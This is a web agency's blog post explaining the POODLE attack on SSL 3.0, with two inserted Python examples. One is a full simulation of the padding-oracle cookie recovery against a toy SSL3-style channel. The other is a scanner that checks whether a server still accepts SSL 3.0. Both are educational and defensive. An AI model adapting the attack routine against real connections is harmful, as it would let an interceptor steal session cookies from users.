SSL 3.0 Poodle exploit leaves encrypted data exposed

Posted by absolute

The latest high-profile security issue to hit the internet is a vulnerability in SSL 3.0, one of the protocols that can be used to encrypt https connections.

The vulnerability, referred to as Poodle, lets an attacker who can intercept a connection decrypt small pieces of it, most usefully the session cookie that identifies a logged-in user.

This means that hackers can potentially access private areas of bank websites, social media sites etc using other users’ logins. We routinely serve the Magento ecommerce websites that we build over https, as well as those CMS sites that contain potentially sensitive data. So it was essential that we responded quickly, re-configuring our servers to remove the risk and prevent similar attacks on the websites that we host.

Does that mean every https connection is exposed? The simple answer is no. https relies on one of several protocols that the browser and the server negotiate between them. In fact SSL 3.0 was superseded back in 1999 by TLS (Transport Layer Security), and it is TLS that modern browsers and servers use.

Simply having SSL 3.0 available does not, on its own, expose anything: the browser and server agree on the best protocol they both support, and only some older browsers (Internet Explorer 6 in particular, which ships with TLS switched off) would choose SSL 3.0 by default. The catch is that the attacker does not need to compromise your browser. Someone on the same network path (on public Wi-Fi, for example) can tamper with the TLS handshakes so that they fail, and most browsers respond by retrying with an older protocol until they get down to SSL 3.0, the so-called downgrade dance. Once the connection is on SSL 3.0, the attacker uses injected JavaScript to make the browser send the same request over and over while they alter the encrypted records on the way past; because SSL 3.0 never checks its padding bytes, the server’s accept-or-reject reply leaks one byte of the cookie for roughly every 256 requests. That is what exposes the encrypted data.
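To make that mechanism concrete, here is an added example (not code from the original post) that simulates the attack end to end in Python: an SSL 3.0-style record layer (MAC, then pad, then CBC-encrypt), a victim browser whose path and body lengths the attacker controls, and a man-in-the-middle that splices ciphertext blocks and watches whether the server accepts them. Everything in it is constructed for the example: the block cipher is a toy Feistel network rather than AES or 3DES (the attack does not depend on which cipher is used), the MAC is HMAC-SHA256, and each record carries an explicit IV rather than SSL 3.0’s chained one. The one faithful SSL 3.0 detail is the padding rule.

```python
"""Simulation of the Poodle padding-oracle attack on SSL 3.0-style CBC records.
Constructed for this example: toy Feistel block cipher (stand-in for the real
cipher), HMAC-SHA256 as the MAC, explicit IV per record. The faithful SSL 3.0
detail is the padding rule: the receiver reads the final pad-length byte and
never inspects the filler bytes in front of it."""
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size
MAC_LEN = 32  # HMAC-SHA256 tag length

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def chunks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

class ToyBlockCipher:
    """16-byte Feistel block cipher: four rounds, round function = keyed HMAC-SHA256."""
    def __init__(self, key: bytes):
        self.key = key

    def _f(self, rnd: int, half: bytes) -> bytes:
        return hmac.new(self.key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

    def encrypt_block(self, block: bytes) -> bytes:
        left, right = block[:8], block[8:]
        for rnd in range(4):
            left, right = right, xor_bytes(left, self._f(rnd, right))
        return left + right

    def decrypt_block(self, block: bytes) -> bytes:
        left, right = block[:8], block[8:]
        for rnd in reversed(range(4)):
            left, right = xor_bytes(right, self._f(rnd, left)), left
        return left + right

class Ssl3Channel:
    """One direction of an SSL 3.0-like channel: MAC, then pad, then CBC-encrypt."""
    def __init__(self):
        self.cipher = ToyBlockCipher(os.urandom(32))
        self.mac_key = os.urandom(32)

    def _mac(self, data: bytes) -> bytes:
        return hmac.new(self.mac_key, data, hashlib.sha256).digest()

    def seal(self, plaintext: bytes) -> bytes:
        """Browser side: returns iv || ciphertext."""
        payload = plaintext + self._mac(plaintext)
        pad_len = BLOCK - 1 - len(payload) % BLOCK          # SSL 3.0 pads pad_len + 1 bytes
        payload += os.urandom(pad_len) + bytes([pad_len])   # filler bytes are arbitrary
        iv = os.urandom(BLOCK)
        prev, out = iv, b""
        for block in chunks(payload):
            prev = self.cipher.encrypt_block(xor_bytes(block, prev))
            out += prev
        return iv + out

    def open(self, record: bytes) -> bool:
        """Server side: True if accepted. This is the oracle: only the pad-length byte
        is checked, so a forged final block passes whenever its last decrypted byte
        happens to be BLOCK - 1, because the MAC then lines up and verifies."""
        blocks = chunks(record)
        plain = b"".join(xor_bytes(self.cipher.decrypt_block(c), p)
                         for p, c in zip(blocks, blocks[1:]))
        pad_len = plain[-1]
        if pad_len >= BLOCK:
            return False
        body = plain[:len(plain) - pad_len - 1]
        if len(body) < MAC_LEN:
            return False
        return hmac.compare_digest(body[-MAC_LEN:], self._mac(body[:-MAC_LEN]))

def make_browser(channel: Ssl3Channel, secret_cookie: bytes):
    """Victim browser: attacker-run JavaScript chooses the path length (prefix) and
    POST body length (suffix); the browser itself inserts the cookie between them."""
    def send(prefix_len: int, body_len: int) -> bytes:
        return channel.seal(b"/" * prefix_len + secret_cookie + b"X" * body_len)
    return send

def poodle_recover(server_open, browser_send, cookie_len: int):
    """Man-in-the-middle: recovers the cookie at roughly 256 requests per byte.
    Returns (recovered_cookie, requests_used)."""
    recovered, requests = bytearray(), 0
    for k in range(cookie_len):
        # Put cookie byte k at the last position of a block, and choose the body length
        # so plaintext + MAC fills whole blocks: the padding is then a full block whose
        # final byte must decrypt to BLOCK - 1 for the server to accept the record.
        prefix_len = (BLOCK - 1 - k) % BLOCK
        body_len = -(prefix_len + cookie_len + MAC_LEN) % BLOCK
        target = (prefix_len + k) // BLOCK + 1        # +1: blocks[0] is the IV
        while True:
            blocks = chunks(browser_send(prefix_len, body_len))
            requests += 1
            blocks[-1] = blocks[target]               # splice target block over the padding
            if server_open(b"".join(blocks)):
                # D(C_target) = P_target ^ C_(target-1); accepted iff (that ^ C_(n-1)) ends in 0x0F
                recovered.append((BLOCK - 1) ^ blocks[target - 1][-1] ^ blocks[-2][-1])
                break
    return bytes(recovered), requests
```

Running `poodle_recover(chan.open, make_browser(chan, cookie), len(cookie))` against a fresh `Ssl3Channel()` returns the cookie in about 256 requests per byte, which is why the real attack needs JavaScript to drive the browser rather than a single intercepted page load. TLS 1.0 and later require every padding byte to equal the pad length, so the same splice is rejected regardless of the last byte and the oracle disappears.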

Considering the age of the protocol and the fact that three versions of TLS have been released since then, the consensus is to stop servers accepting SSL 3.0 altogether. Disabling it on the server protects every visitor at once, because a downgrade can only fall as far as the server allows. This is the path that we have taken on our servers, as have many of the major players such as Twitter and Facebook. On the browser side, both Mozilla and Google have confirmed that Firefox and Chrome will drop SSL 3.0 in forthcoming releases. Be warned, though, that people on older browsers who have not yet updated remain exposed on any site that still accepts SSL 3.0 (and will simply be unable to reach sites that have turned it off).
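A practical way to confirm that a server really has stopped accepting SSL 3.0, given here as an added example rather than anything from the original post: the script below hand-builds an SSL 3.0 ClientHello (modern Python `ssl` builds cannot speak SSL 3.0 at all) and classifies the first record the server sends back. A ServerHello carrying version 3.0 means the server still accepts it; a fatal alert or a dropped connection means it has been disabled. The cipher-suite numbers and alert names are the standard values. `probe()` needs network access, while `classify_response()` is pure parsing and is exercised on constructed byte strings.

```python
"""Does a server still negotiate SSL 3.0? Hand-built SSLv3 ClientHello plus a
classifier for the first record that comes back. Added example: probe() needs
network access, classify_response() is pure parsing."""
import os
import socket
import struct

SSLV3 = b"\x03\x00"
# A handful of RSA suites any SSL 3.0-era server recognises (IANA code points).
CIPHER_SUITES = [0x002F, 0x0035, 0x000A, 0x0005]
ALERT_NAMES = {40: "handshake_failure", 70: "protocol_version", 80: "internal_error"}


def build_sslv3_client_hello() -> bytes:
    """Record layer: type 0x16 (handshake), version 3.0, length; then the ClientHello."""
    body = SSLV3 + os.urandom(32) + b"\x00"            # version, random, empty session id
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                                # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # type 1 = client_hello
    return b"\x16" + SSLV3 + struct.pack("!H", len(handshake)) + handshake


def classify_response(data: bytes) -> str:
    """Interpret the first SSL/TLS record the server sent (or nothing at all)."""
    if len(data) < 5:
        return "closed"                                # dropped without sending a record
    ctype, version, length = data[0], data[1:3], struct.unpack("!H", data[3:5])[0]
    payload = data[5:5 + length]
    if ctype == 0x15 and len(payload) >= 2:            # alert: level, description
        return "rejected:" + ALERT_NAMES.get(payload[1], str(payload[1]))
    if ctype == 0x16 and len(payload) >= 6 and payload[0] == 0x02:   # ServerHello
        if version == SSLV3 and payload[4:6] == SSLV3:
            return "sslv3-accepted"
        return "unexpected-version:" + payload[4:6].hex()
    return "unexpected"


def probe(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Send the SSLv3 ClientHello to host:port and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            return classify_response(sock.recv(4096))
        except (ConnectionResetError, socket.timeout):
            return "closed"


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it as `python poodle_check.py www.example.com` (a hypothetical file name): anything other than `sslv3-accepted` means the downgrade has nowhere to go on that server. Check every hostname and port you terminate TLS on, including load balancers and any admin or API endpoints configured separately from the main site.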

Make sure your browser is up to date, keep your antivirus software current and scan your system regularly. If your website supports https connections and you’re concerned about possible security issues, then contact us. We’re more than happy to talk through your infrastructure and advise you on what action you should take. Even if you’re not one of our clients! We’re nice like that.

To find out how Absolute can help you build a new, secure website call Liam Wiltshire on 0115 953 4800 ext 205 or email liam.wiltshire@absolute-design.co.uk.